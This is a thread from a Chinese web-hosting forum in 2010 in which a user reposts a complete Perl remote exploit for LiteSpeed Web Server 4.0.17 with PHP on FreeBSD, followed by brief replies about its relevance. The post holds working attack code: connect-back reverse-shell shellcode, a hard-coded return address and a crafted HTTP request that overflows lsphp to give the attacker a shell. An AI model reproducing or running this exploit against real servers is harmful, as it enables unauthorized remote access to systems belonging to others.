全球主机交流论坛

标题: LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit [打印本页]

作者: greensnow 时间: 2010-12-11 14:08
标题: LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered & exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86
# can be used against the admin interface (port 7080), too
# Xploit only works on default lsphp binary not the compiled version
#
# this should be exploitable on linux too (on the compiled SAPI version)
# the shipped linux version of lsphp has stack cookies enabled,
# which could be brute forced if there wasn't a null put at the end of
# the exploit buffer. The compiled SAPI version is exploitable, but then
# the offsets differ from box to box, so this time FreeBSD targets only.
# thus on linux this is very tricky to exploit.
# this is a proof of concept, don't try this on real boxes
# see lsapilib.c line 1240
(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)

use IO::Socket;

$|=1;

#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
   # setreuid, no root here
   "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
   # connect back :>
   "\x31\xc0\x31\xdb\x53\xb3\x06\x53".
   "\xb3\x01\x53\xb3\x02\x53\x54\xb0".
   "\x61\xcd\x80\x31\xd2\x52\x52\x68".
   "\x41\x41\x41\x41\x66\x68\x01\xbb".
   "\xb7\x02\x66\x53\x89\xe1\xb2\x10".
   "\x52\x51\x50\x52\x89\xc2\x31\xc0".
   "\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
   "\x74\x06\x31\xc0\xb0\x01\xcd\x80".
   "\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
   "\x80\x31\xc0\x31\xdb\x43\x53\x52".
   "\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
   "\x53\x52\x50\xb0\x5a\xcd\x80\x31".
   "\xc0\x50\x68\x2f\x2f\x73\x68\x68".
   "\x2f\x62\x69\x6e\x89\xe3\x50\x54".
   "\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
   "\xb0\x01\xcd\x80";

sub usage() {
   print "written by kingcope\n";
   print "usage:\n".
               "litespeed-remote.pl <target ip/host> <target port>
<your ip> <php file on remote host>\n\n".
               "example:\n".
               "perl litespeed-remote.pl 192.168.2.3 8088
192.168.2.2 phpinfo.php\n\n";

   exit;
}

if ($#ARGV ne 3) { usage; }

$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));

substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);

#my $sock = IO::Socket::INET->new(PeerAddr => $target,
#                               PeerPort => 8088,
#                                        Proto => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n";

#$x = <stdin>;

#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp

my $sock = IO::Socket::INET->new(PeerAddr => $target,
                              PeerPort => $port,
                                       Proto => 'tcp');

$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
$sc = "\x90" x 3000 . $bsdcbsc;

print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file?
HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n";

while (<$sock>) {
   print;
}

作者: cnshayo 时间: 2010-12-11 14:12
现在的还像是18了，哈哈，用处不大了吧

作者: cnx 时间: 2010-12-11 14:23
顶一下。

作者: Globalization 时间: 2010-12-11 14:24
写的啥？

作者: wdlth 时间: 2010-12-11 14:30
FreeBSD的，无压力。

作者: 小夜 时间: 2010-12-11 14:31
还好，我是centos。

作者: wdlth 时间: 2010-12-11 14:50
this should be exploitable on linux too (on the compiled SAPI version)，去研究下。

[ 本帖最后由 wdlth 于 2010-12-11 14:51 编辑 ]

作者: yc260982 时间: 2010-12-11 15:23
压力很大

欢迎光临全球主机交流论坛 (https://fd.vvwvv.eu.org/)